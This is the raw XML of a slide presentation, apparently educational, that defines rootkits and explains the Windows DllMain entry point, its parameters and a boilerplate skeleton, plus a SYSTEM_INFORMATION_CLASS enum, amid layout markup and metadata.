                  <a:cubicBezTo>
                    <a:pt x="24" y="0"/>
                    <a:pt x="27" y="0"/>
                    <a:pt x="28" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="14"/>
                    <a:pt x="34" y="14"/>
                    <a:pt x="34" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="16"/>
                    <a:pt x="48" y="16"/>
                    <a:pt x="48" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="16"/>
                    <a:pt x="50" y="17"/>
                    <a:pt x="50" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="19"/>
                    <a:pt x="50" y="20"/>
                    <a:pt x="49" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="30"/>
                    <a:pt x="40" y="30"/>
                    <a:pt x="40" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="44"/>
                    <a:pt x="42" y="44"/>
                    <a:pt x="42" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="45"/>
                    <a:pt x="42" y="46"/>
                    <a:pt x="41" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="48"/>
                    <a:pt x="39" y="48"/>
                    <a:pt x="37" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="41"/>
                    <a:pt x="25" y="41"/>
                    <a:pt x="25" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="47"/>
                    <a:pt x="13" y="47"/>
                    <a:pt x="13" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="47"/>
                    <a:pt x="12" y="48"/>
                    <a:pt x="12" y="48"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="25" y="34"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="34"/>
                    <a:pt x="26" y="35"/>
                    <a:pt x="27" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="39"/>
                    <a:pt x="35" y="39"/>
                    <a:pt x="35" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="30"/>
                    <a:pt x="33" y="30"/>
                    <a:pt x="33" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="29"/>
                    <a:pt x="34" y="28"/>
                    <a:pt x="34" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="21"/>
                    <a:pt x="41" y="21"/>
                    <a:pt x="41" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="20"/>
                    <a:pt x="32" y="20"/>
                    <a:pt x="32" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="19"/>
                    <a:pt x="30" y="19"/>
                    <a:pt x="29" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="10"/>
                    <a:pt x="25" y="10"/>
                    <a:pt x="25" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="18"/>
                    <a:pt x="21" y="18"/>
                    <a:pt x="21" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="19"/>
                    <a:pt x="20" y="19"/>
                    <a:pt x="19" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="21"/>
                    <a:pt x="10" y="21"/>
                    <a:pt x="10" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="27"/>
                    <a:pt x="17" y="27"/>
                    <a:pt x="17" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="28"/>
                    <a:pt x="18" y="29"/>
                    <a:pt x="17" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="39"/>
                    <a:pt x="16" y="39"/>
                    <a:pt x="16" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="35"/>
                    <a:pt x="24" y="35"/>
                    <a:pt x="24" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="35"/>
                    <a:pt x="25" y="34"/>
                    <a:pt x="25" y="34"/>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pic>
          <p:nvPicPr>
            <p:cNvPr id="18" name="图形 17" descr="templates\docerresourceshop\icons\\32313535373331353b32313535373332313bc8cbb9a4d6c7c4dcbbfac6f7c8cb"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId10"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId11">
              <a:extLst>
                <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                  <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId12"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="9506485" y="4632711"/>
              <a:ext cx="1260000" cy="1260000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7"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13"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1132205" y="1837690"/>
            <a:ext cx="9498965" cy="301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gn="just">
              <a:lnSpc>
                <a:spcPts val="3700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="200000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId14"/>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mn-ea"/>
              </a:rPr>
              <a:t>A rootkit is a type of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>malware designed to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>hide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> the presence of other software, such as malware, on a computer system. Rootkits can be used to gain unauthorized access to a system, steal sensitive information, or carry out other malicious actions.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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DllMain</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pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13" descr="2378 [转换]"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="-644" r="84596" b="8932"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="236220" y="5021965"/>
            <a:ext cx="1029547" cy="1440000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="378" name="折角形 377"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="955040" y="1355090"/>
            <a:ext cx="10281920" cy="3667125"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">
            <a:avLst>
              <a:gd name="adj" fmla="val 18909"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:sysClr val="window" lastClr="FFFFFF"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="152400" dist="38100" dir="5400000" algn="t"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379" name="任意多边形 378"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1050290" y="1355090"/>
            <a:ext cx="428625" cy="368935"/>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rgbClr val="E045DD"/>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3"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6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1050290" y="1321435"/>
            <a:ext cx="9919335" cy="3700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38100" indent="0">
              <a:lnSpc>
                <a:spcPts val="3600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="200000"/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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7"/>
              </a:buBlip>
              <a:extLst>
                <a:ext uri="{35155182-B16C-46BC-9424-99874614C6A1}">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mn-ea"/>
              </a:rPr>
              <a:t>DllMain is a special function in a Windows Dynamic Link Library (DLL) that serves as an entry point for initializing and uninitializing the DLL when it's loaded and unloaded by processes. It's analogous to the main function in a C/C++ program but specific to DLLs. Here are the key points about DllMain:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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7"/>
              </a:buBlip>
              <a:extLst>
                <a:ext uri="{35155182-B16C-46BC-9424-99874614C6A1}">
                  <wpsdc:marlchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="250" checksum="1039213347"/>
                </a:ext>
              </a:extLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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Key Point: Function Signature</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9" name="Text Box 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2023745" y="1162685"/>
            <a:ext cx="8144510" cy="2207260"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D1202F"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>BOOL WINAPI DllMain(</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>    HINSTANCE hinstDLL,  // Handle to the DLL module</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>    DWORD fdwReason,     // Reason for calling the function</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>    LPVOID lpReserved    // Reserved; should be NULL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Box 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="528955" y="3629660"/>
            <a:ext cx="11134090" cy="2501900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">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hinstDLL</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This parameter is a handle to the DLL module. It is typically used to identify the instance of the DLL and obtain information about it.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">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fdwReason</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>:</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This parameter specifies the reason why DllMain is being called. It can have values like DLL_PROCESS_ATTACH, DLL_PROCESS_DETACH, DLL_THREAD_ATTACH, or DLL_THREAD_DETACH, indicating whether the DLL is being loaded or unloaded and whether it's happening for the entire process  or just for a specific thread.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">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lpReserved</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This parameter is reserved for future use and should be NULL.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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Key Point: Return value and Entry and Exit</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455295" y="1238885"/>
            <a:ext cx="11263630" cy="463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DllMain should return TRUE if it succeeds or FALSE if it fails. If it returns FALSE during a process's or thread's attachment, the DLL's loading is aborted, and it's immediately unloaded. This is typically done when the DLL cannot initialize properly.</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Entry and Exit Point: DllMain is automatically called by the operating system when a process loads or unloads the DLL. You don't call it explicitly in your code; the OS takes care of this.</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endParaRPr lang="en-US" altLang="zh-CN" sz="30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DllMain</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 name="Text Box 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="991870" y="1075055"/>
            <a:ext cx="10208260" cy="5354320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D1202F"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;Windows.h&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pP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BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) {</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switch (fdwReason) {</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case DLL_PROCESS_ATTACH:</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 Initialization code for when the DLL is loaded into a process</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break;</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case DLL_PROCESS_DETACH:</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 Cleanup code for when the DLL is unloaded from a process</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break;</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case DLL_THREAD_ATTACH:</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 Initialization code for when a new thread is created</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break;</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case DLL_THREAD_DETACH:</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 Cleanup code for when a thread exits</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break;</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return TRUE; // Return TRUE if successful</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SYSTEM_INFORMATION_CLASS</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 name="Text Box 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2287905" y="1042670"/>
            <a:ext cx="7616190" cy="5367655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D1202F"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>typedef enum class _SYSTEM_INFORMATION_CLASS {</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SystemBasicInformation = 0,</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SystemPerformanceInformation = 2,</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SystemTimeOfDayInformation = 3,</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SystemProcessInformation = 5,</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SystemProcessorPerformanceInformation = 8,</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SystemInterruptInformation = 23,</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SystemExceptionInformation = 33,</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SystemRegistryQuotaInformation = 37,</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SystemLookasideInformation = 45,</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SystemCodeIntegrityInformation = 103,</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SystemPolicyInformation = 134,</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SYSTEM_INFORMATION_CLASS;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="240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
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="5"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>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
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="5"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>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i"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="mixed20201941_294*i*1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="mixed"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20201941"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_TEXTBOXSTYLE_GUID" val="{b6114a12-4d76-4813-96de-34db54c419f7}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag342.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i"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="2"/>
  <p:tag name="KSO_WM_UNIT_ID" val="mixed20201941_294*i*2"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="mixed"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20201941"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_TEXTBOXSTYLE_GUID" val="{b6114a12-4d76-4813-96de-34db54c419f7}"/>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SPECIAL_SOURCE" val="bdnull"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="diagram20227964_3"/>
  <p:tag name="KSO_WM_TEMPLATE_SUBCATEGORY" val="0"/>
  <p:tag name="KSO_WM_TEMPLATE_MASTER_TYPE" val="1"/>
  <p:tag name="KSO_WM_TEMPLATE_COLOR_TYPE" val="0"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="3"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20227964"/>
  <p:tag name="KSO_WM_SLIDE_TYPE" val="text"/>
  <p:tag name="KSO_WM_SLIDE_SUBTYPE" val="diag"/>
  <p:tag name="KSO_WM_SLIDE_ITEM_CNT" val="3"/>
  <p:tag name="KSO_WM_SLIDE_SIZE" val="913.55*403"/>
  <p:tag name="KSO_WM_SLIDE_POSITION" val="0*66.25"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_SLIDE_DIAGTYPE" val="l"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT" val="l"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT_CNT" val="1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag475.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="COMMONDATA" val="eyJoZGlkIjoiMmY5MzdhMTM4MGYwZjY3MmUyNDAwYWI5ODI4MjA4MzUifQ=="/>
</p:tagLst>
</file>

<file path=ppt/tags/tag4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3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1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1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2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2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4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2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2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2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2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29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30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3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3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3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3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3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3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3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3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lnSpc>
            <a:spcPct val="90000"/>
          </a:lnSpc>
          <a:defRPr lang="en-US" sz="2000">
            <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            <a:cs typeface="Times New Roman" panose="0202060305040502030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rgbClr val="00B0F0">
            <a:alpha val="5000"/>
          </a:srgbClr>
        </a:solidFill>
        <a:ln>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>
          </a:solidFill>
        </a:ln>
      </a:spPr>
      <a:bodyPr wrap="square" rtlCol="0">
        <a:spAutoFit/>
      </a:bodyPr>
      <a:lstStyle>
        <a:defPPr algn="l">
          <a:lnSpc>
            <a:spcPct val="100000"/>
          </a:lnSpc>
          <a:defRPr lang="en-US" sz="2500">
            <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            <a:cs typeface="Times New Roman" panose="0202060305040502030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8.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9.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="8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0.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="9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1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="10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1500">
            <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            <a:sym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2.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="1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3.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="1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4.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="1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5.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="1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6.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="1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7.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="1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8.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="18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9.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="19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0.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="20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1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="2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2.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="2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3.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="2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4.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="1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26753</Words>
  <Application>WPS Writer</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>722</Paragraphs>
  <Slides>34</Slides>
  <Notes>11</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="6" baseType="variant">
      <vt:variant>
        <vt:lpstr>已用的字体</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>29</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>主题</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>64</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>幻灯片标题</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>34</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="127" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>SimSun</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>阿里巴巴普惠体 R</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>华文楷体</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>Palatino Linotype</vt:lpstr>
